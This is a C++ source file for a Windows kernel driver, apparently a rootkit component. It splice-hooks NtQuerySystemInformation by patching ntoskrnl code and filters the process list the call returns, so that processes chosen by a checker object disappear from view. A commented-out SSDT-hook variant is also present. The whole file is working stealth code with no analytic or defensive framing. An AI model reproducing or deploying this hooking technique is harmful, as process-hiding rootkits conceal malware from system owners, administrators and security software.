#include "drvCommon.h"
#include "HookFactory.h"
#include "ProcessHook.h"
#include "StringUtils.h"
#include "ProcessHideAlgorithm.h"

extern "C"
{
typedef NTSTATUS (*NtQuerySystemInfoPtr)(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL
    );

NTSTATUS NewNtQuerySystemInfo(
    IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength,
    OUT PULONG ReturnLength OPTIONAL
    );
};

namespace HideDriver
{
const wchar_t* strZwQuerySystemInfo = L"ZwQuerySystemInformation";
const wchar_t* strNtQuerySystemInfo = L"NtQuerySystemInformation";

/*Pointer to original NtQuerySystemInformation function*/
NtQuerySystemInfoPtr TrueNtQuerySystemInfo;

/*File checker decide hide file or not*/
HideAlgorithm::IProcessChecker* gProcessChecker;

/*NewNtQuerySystemInfo: hooked version of NtQuerySystemInformation function*/
NTSTATUS NewNtQuerySystemInfo(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
							  IN OUT PVOID SystemInformation,
							  IN ULONG SystemInformationLength,
							  OUT PULONG ReturnLength OPTIONAL);

//////////////////////////////////////////////////////////////////////////////////

ProcessHook::ProcessHook(HideAlgorithm::IProcessChecker* processChecker)
{
    gProcessChecker = processChecker;
}

struct NtQuerySystemInfo_HookHandler_Data
{
    unsigned long dwRealIP;
    // args
    SYSTEM_INFORMATION_CLASS SystemInformationClass;
    PVOID SystemInformation;
    ULONG SystemInformationLength;
    PULONG ReturnLength;
};

DEFINE_POST_HANDLER(NtQuerySystemInfo_HookHandler_PostHandler,
                    NtQuerySystemInfo_HookHandler_PostHandlerImpl, 
struct NtQuerySystemInfo_HookHandler_Data)
    DEFINE_FORE_HANDLER(NtQuerySystemInfo_HookHandler, NtQuerySystemInfo_HookHandlerImpl)

    static 
    void 
    __stdcall 
    NtQuerySystemInfo_HookHandler_PostHandlerImpl(unsigned long * pRetValue, 
struct NtQuerySystemInfo_HookHandler_Data * pData, 
    unsigned long dwOldEax)
{

    *pRetValue = pData->dwRealIP;

    if ( (pData->SystemInformationClass != SystemProcessesAndThreadsInformation) || (dwOldEax != 0) )
    {
        FreeMemory(&g_kernelNonPagedAllocator, pData);
        return;
    }

    HideAlgorithm::NtQuerySysInfoParams params = {pData->SystemInformationClass,pData->SystemInformation,
        pData->SystemInformationLength,pData->ReturnLength};

    HideAlgorithm::HideProcess(params,gProcessChecker);

    FreeMemory(&g_kernelNonPagedAllocator, pData);
}

//-------------------------------------------------------------------------
static void __stdcall NtQuerySystemInfo_HookHandlerImpl(unsigned long * pContext)
{
    unsigned long * pRetPoint = GET_RET_POINT_PTR(pContext);
    struct NtQuerySystemInfo_HookHandler_Data * pParamsData = 0;
    void * pStub = 0;

    if (AllocatePostParams(&g_kernelNonPagedAllocator, 
        sizeof(struct NtQuerySystemInfo_HookHandler_Data),
        NtQuerySystemInfo_HookHandler_PostHandler,
        (void**)&pParamsData, 
        &pStub)
        )
        return;

    // fill params
    pParamsData->dwRealIP = *pRetPoint;
    pParamsData->SystemInformationClass = (SYSTEM_INFORMATION_CLASS)GET_PARAM(pContext, 0);
    pParamsData->SystemInformation = (PVOID)GET_PARAM(pContext, 1);
    pParamsData->SystemInformationLength = GET_PARAM(pContext, 2);
    pParamsData->ReturnLength = GET_PARAM_PTR(pContext, 3);

    // set new ret point
    *pRetPoint = (unsigned long)pStub;
}

void ProcessHook::CreateSpliceHook(PUNICODE_STRING function_name)
{
    //Here starts interesting stuff
    int iRes = 0;
    NTSTATUS status = STATUS_UNSUCCESSFUL;
    status = PatchNtosFunction_npaged(function_name->Buffer, 
        function_name->Length,
        NtQuerySystemInfo_HookHandler,
        &iRes);

    if (status!=STATUS_SUCCESS)
        return;


}

void ProcessHook::Initialize(HookMng& hookMng)
{
    std::wstring functionName(strZwQuerySystemInfo);
    UNICODE_STRING functionNameUnc = utils::wstring2UnicodeStr(functionName); 

//     hook_ = CreateSSTHook( &NewNtQuerySystemInfo ,&functionNameUnc);
// 
//     // Need to save original function address before apply hook
//     TrueNtQuerySystemInfo = (NtQuerySystemInfoPtr)hook_.trueFuncPtr;
// 
//     hookMng.AddHook(hook_);
    
    std::wstring ntFunctionName(strNtQuerySystemInfo);
    UNICODE_STRING ntFunctionNameUnc = utils::wstring2UnicodeStr(ntFunctionName);

    void * pAddress = GetKernelAnalogAddress(GetModuleBase("ntdll.dll"),"ZwProtectVirtualMemory");
    if (!pAddress)
        return;
    InitKernelAllocators((PZwProtectVirtualMemoryType)pAddress, &Defence_Patcher);
    CreateSpliceHook( &ntFunctionNameUnc );
}

void ProcessHook::Cleanup(HookMng& hookMng)
{
//     hookMng.DeleteHook(hook_);
}

//////////////////////////////////////////////////////////////////////////////////


NTSTATUS NewNtQuerySystemInfo(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
						      IN OUT PVOID SystemInformation,
							  IN ULONG SystemInformationLength,
							  OUT PULONG ReturnLength OPTIONAL)
{
	NTSTATUS status = TrueNtQuerySystemInfo(SystemInformationClass, SystemInformation,
											SystemInformationLength, ReturnLength);
    if( !NT_SUCCESS(status) )
        return status;

	if(SystemInformationClass != SystemProcessesAndThreadsInformation)
		return status;

	using namespace HideAlgorithm;

	NtQuerySysInfoParams params = {SystemInformationClass,SystemInformation,
								   SystemInformationLength,ReturnLength};

	return HideProcess(params,gProcessChecker);
}
}// namespace HideDriver